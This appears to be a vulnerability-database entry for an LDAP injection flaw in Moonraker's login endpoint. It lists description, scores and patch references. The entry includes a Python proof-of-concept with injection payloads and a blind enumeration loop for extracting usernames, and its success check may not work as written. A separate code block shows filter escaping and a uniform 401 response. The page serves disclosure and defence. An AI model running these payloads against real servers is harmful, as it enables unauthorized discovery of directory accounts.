Security Vulnerability Report
CVE-2026-24130 CVSS 5.3 MEDIUM

CVE-2026-24130

Published: 2026-01-22 23:15:58
Last Modified: 2026-02-27 13:57:16

Description

Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:arksine:moonraker:*:*:*:*:*:python:*:* - VULNERABLE
Moonraker <= 0.9.3 (with LDAP component enabled)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-24130 LDAP Injection PoC for Moonraker
# Target: Moonraker < 0.10.0 with LDAP component enabled

TARGET_URL = "http://target-ip:7125"
LOGIN_ENDPOINT = f"{TARGET_URL}/access/login"


def test_ldap_injection_basic():
    """Test basic LDAP injection to determine if vulnerability exists"""
    # Test payload: wildcard injection to check if filter is injectable
    payloads = [
        {"user": "*", "password": "invalid"},  # Wildcard test
        {"user": "admin)(*)(&password=test", "password": "test"},  # Filter manipulation
        {"user": "*)*)(&password=test", "password": "test"},  # Filter closing
    ]

    print("[*] Testing LDAP Injection vulnerability...")
    for i, payload in enumerate(payloads, 1):
        try:
            response = requests.post(LOGIN_ENDPOINT, json=payload, timeout=10)
            print(f"[*] Payload {i}: Status={response.status_code}")
            # Different response patterns may indicate successful injection
            if response.status_code == 401:
                print(f"    Response: {response.text[:200]}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")


def enumerate_ldap_entries():
    """Brute force enumeration of LDAP entries using boolean injection"""
    # Example: Enumerating usernames character by character
    charset = "abcdefghijklmnopqrstuvwxyz0123456789_-@."
    discovered_user = ""

    print("[*] Starting LDAP entry enumeration...")
    for pos in range(1, 33):  # Max username length 32
        found = False
        for char in charset:
            # Blind boolean injection - extract character by character
            test_user = discovered_user + char
            payload = {
                "user": f")({test_user}*",  # LDAP filter injection
                "password": "dummy",
            }
            try:
                response = requests.post(LOGIN_ENDPOINT, json=payload, timeout=5)
                # Analyze response timing or content differences
                if response.status_code == 401 and "invalid" in response.text.lower():
                    discovered_user += char
                    print(f"[+] Position {pos}: Found '{char}', current: {discovered_user}")
                    found = True
                    break
            except requests.exceptions.RequestException:
                # Network error for this probe: move on to the next character
                pass
        if not found:
            break

    print(f"[*] Discovered LDAP entry: {discovered_user}")
    return discovered_user


if __name__ == "__main__":
    print("=" * 50)
    print("CVE-2026-24130 Moonraker LDAP Injection PoC")
    print("=" * 50)
    test_ldap_injection_basic()
    # Uncomment to run enumeration (requires vulnerable target)
    # enumerate_ldap_entries()
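The two defects the record names (filter metacharacters interpolated into the LDAP search filter, and a 401 body that differs depending on whether the search matched) next to their fixes, as an added illustration that is not Moonraker's code. The filter template `(uid={user})`, the `count_assertions` helper and the response bodies are constructed for this example.

```python
import re

# RFC 4515 escapes for the characters that would otherwise change filter structure.
_RFC4515_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape an assertion value so it is matched literally inside an LDAP filter."""
    return "".join(_RFC4515_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(template: str, user: str) -> str:
    """Vulnerable pattern: raw interpolation lets '*' or ')(' rewrite the filter."""
    return template.format(user=user)


def build_filter_safe(template: str, user: str) -> str:
    """Hardened pattern: the escaped value can only ever be one literal assertion."""
    return template.format(user=escape_filter_value(user))


def count_assertions(ldap_filter: str) -> int:
    """Count '(attr=value)' components; a changed count means injected structure."""
    return len(re.findall(r"\([^()]*=[^()]*\)", ldap_filter))


# One fixed 401 body, returned whether or not the directory search matched, so the
# error message cannot serve as an oracle for enumerating directory entries.
_GENERIC_401 = {"status": 401, "message": "Invalid username or password"}


def login_response(entry_found: bool, password_ok: bool) -> dict:
    """Map the authentication outcome to a response without leaking the search result."""
    if entry_found and password_ok:
        return {"status": 200}
    return dict(_GENERIC_401)


if __name__ == "__main__":
    template = "(&(objectClass=person)(uid={user}))"  # constructed filter template
    for user in ["alice", "*", "admin)(uid=*"]:  # constructed login inputs
        unsafe, safe = build_filter_unsafe(template, user), build_filter_safe(template, user)
        print(f"{user!r:18} unsafe={unsafe}  [{count_assertions(unsafe)} assertions]")
        print(f"{'':18} safe  ={safe}  [{count_assertions(safe)} assertions]")
    # A matched and an unmatched entry produce the identical 401 body.
    print(login_response(False, False) == login_response(True, False))
```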

References

https://github.com/Arksine/moonraker/commit/74c5d8e44c4a4abbfbb06fb991e7ebb9ac947f42 (Patch)
https://github.com/Arksine/moonraker/security/advisories/GHSA-3jqf-v4mv-747g (Mitigation, Vendor Advisory)

Additional NVD Record Data

Status: Analyzed
Weaknesses: CWE-90 (Improper Neutralization of Special Elements used in an LDAP Query, 'LDAP Injection'), CWE-209 (Generation of Error Message Containing Sensitive Information)
CVSS 4.0 (Secondary): 2.7 LOW, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U
CVSS 3.1 (Primary): Exploitability 3.9, Impact 1.4
CPE Match: cpe:2.3:a:arksine:moonraker:*:*:*:*:*:python:*:*, versionEndExcluding 0.10.0 (matchCriteriaId DC3E79B0-4D30-48F6-87F5-19439216A6AE)